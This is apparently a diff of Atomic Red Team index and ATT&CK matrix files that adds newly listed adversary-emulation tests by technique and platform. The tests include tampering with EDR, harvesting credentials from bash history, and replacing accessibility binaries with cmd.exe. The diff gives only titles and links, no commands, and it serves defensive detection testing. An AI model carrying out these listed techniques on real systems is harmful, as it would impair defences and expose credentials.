- Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS [macos]
|
||||
- Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.012 Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -281,6 +284,7 @@
|
||||
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -315,6 +319,7 @@
|
||||
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1674 Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.005 Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -406,6 +411,7 @@
|
||||
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -518,6 +524,7 @@
|
||||
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1213.006 Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1115 Clipboard Data](../../T1115/T1115.md)
|
||||
- Atomic Test #3: Execute commands from clipboard [macos]
|
||||
@@ -604,6 +611,8 @@
|
||||
- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
@@ -646,7 +655,9 @@
|
||||
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
|
||||
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
|
||||
- Atomic Test #4: List loaded kernel extensions (macOS) [macos]
|
||||
- Atomic Test #5: Find Kernel Extensions (macOS) [macos]
|
||||
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
|
||||
- Atomic Test #2: View sudoers access [linux, macos]
|
||||
@@ -660,7 +671,8 @@
|
||||
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
|
||||
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
|
||||
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1007 System Service Discovery](../../T1007/T1007.md)
|
||||
- Atomic Test #5: System Service Discovery - macOS launchctl [macos]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
@@ -676,6 +688,7 @@
|
||||
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
|
||||
- Atomic Test #33: sysctl to gather macOS hardware info [macos]
|
||||
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518.002 Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
|
||||
@@ -694,7 +707,8 @@
|
||||
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
|
||||
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1057 Process Discovery](../../T1057/T1057.md)
|
||||
@@ -720,6 +734,7 @@
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
- Atomic Test #3: Find and Display Safari Browser Version [macos]
|
||||
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1124 System Time Discovery](../../T1124/T1124.md)
|
||||
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
|
||||
|
||||
|
||||
@@ -142,6 +142,7 @@
|
||||
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
|
||||
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
|
||||
- Atomic Test #2: Certutil Rename and Decode [windows]
|
||||
- Atomic Test #11: Expand CAB with expand.exe [windows]
|
||||
- [T1562 Impair Defenses](../../T1562/T1562.md)
|
||||
- Atomic Test #1: Windows Disable LSA Protection [windows]
|
||||
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
|
||||
@@ -426,7 +427,9 @@
|
||||
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
|
||||
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
|
||||
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
|
||||
- T1679 Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1678 Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
|
||||
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
|
||||
@@ -482,7 +485,9 @@
|
||||
- Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
|
||||
- Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
|
||||
- Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
|
||||
- Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.012 Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
|
||||
@@ -777,6 +782,7 @@
|
||||
- Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
|
||||
- Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
|
||||
- Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
|
||||
- Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
|
||||
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
|
||||
- Atomic Test #1: Process Injection via C# [windows]
|
||||
- Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
|
||||
@@ -869,6 +875,7 @@
|
||||
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
|
||||
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
|
||||
- Atomic Test #1: Install AppInit Shim [windows]
|
||||
@@ -949,6 +956,7 @@
|
||||
- Atomic Test #10: LNK Payload Download [windows]
|
||||
- Atomic Test #11: Mirror Blast Emulation [windows]
|
||||
- Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
|
||||
- Atomic Test #13: Simulate Click-Fix via Downloaded BAT File [windows]
|
||||
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1106 Native API](../../T1106/T1106.md)
|
||||
@@ -962,6 +970,7 @@
|
||||
- T1674 Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
|
||||
- Atomic Test #1: AutoIt Script Execution [windows]
|
||||
- T1204.005 Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
|
||||
- Atomic Test #1: Radmin Viewer Utility [windows]
|
||||
@@ -1245,6 +1254,7 @@
|
||||
- Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
|
||||
- Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
|
||||
- Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
|
||||
- Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
- Atomic Test #1: Create a new Windows domain admin user [windows]
|
||||
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
|
||||
@@ -1328,6 +1338,7 @@
|
||||
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
|
||||
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1197 BITS Jobs](../../T1197/T1197.md)
|
||||
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
|
||||
@@ -1510,6 +1521,7 @@
|
||||
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
|
||||
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
|
||||
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
|
||||
- T1213.006 Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1119 Automated Collection](../../T1119/T1119.md)
|
||||
- Atomic Test #1: Automated Collection Command Prompt [windows]
|
||||
- Atomic Test #2: Automated Collection PowerShell [windows]
|
||||
@@ -1712,6 +1724,7 @@
|
||||
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
|
||||
- [T1649 Steal or Forge Authentication Certificates](../../T1649/T1649.md)
|
||||
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
|
||||
- T1552.003 Unsecured Credentials: Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
@@ -1848,6 +1861,8 @@
|
||||
- Atomic Test #1: System Service Discovery [windows]
|
||||
- Atomic Test #2: System Service Discovery - net.exe [windows]
|
||||
- Atomic Test #4: Get-Service Execution [windows]
|
||||
- Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
|
||||
- Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #5: Windows Internal Packet Capture [windows]
|
||||
@@ -1900,6 +1915,7 @@
|
||||
- Atomic Test #40: Discover OS Build Number via Registry [windows]
|
||||
- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
|
||||
- Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
|
||||
- T1518.002 Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1010 Application Window Discovery](../../T1010/T1010.md)
|
||||
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
|
||||
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1936,10 +1952,12 @@
|
||||
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
|
||||
- Atomic Test #6: Launch DirLister Executable [windows]
|
||||
- Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [windows]
|
||||
- Atomic Test #9: Recursive Enumerate Files And Directories By Powershell [windows]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #1: System Network Connections Discovery [windows]
|
||||
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
|
||||
- Atomic Test #4: System Discovery using SharpView [windows]
|
||||
- Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
|
||||
- Atomic Test #7: System Discovery using SharpView [windows]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1654 Log Enumeration](../../T1654/T1654.md)
|
||||
- Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
|
||||
@@ -2025,6 +2043,7 @@
|
||||
- Atomic Test #6: WinPwn - powerSQL [windows]
|
||||
- [T1622 Debugger Evasion](../../T1622/T1622.md)
|
||||
- Atomic Test #1: Detect a Debugger Presence in the Machine [windows]
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1124 System Time Discovery](../../T1124/T1124.md)
|
||||
- Atomic Test #1: System Time Discovery [windows]
|
||||
- Atomic Test #2: System Time Discovery - PowerShell [windows]
|
||||
|
||||
@@ -13,8 +13,8 @@
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts: Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Process Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote System Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Boot or Logon Initialization Scripts: Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | vSphere Installation Bundles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | vSphere Installation Bundles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | | | Obfuscated Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Proxy: Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -4,53 +4,53 @@
|
||||
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A 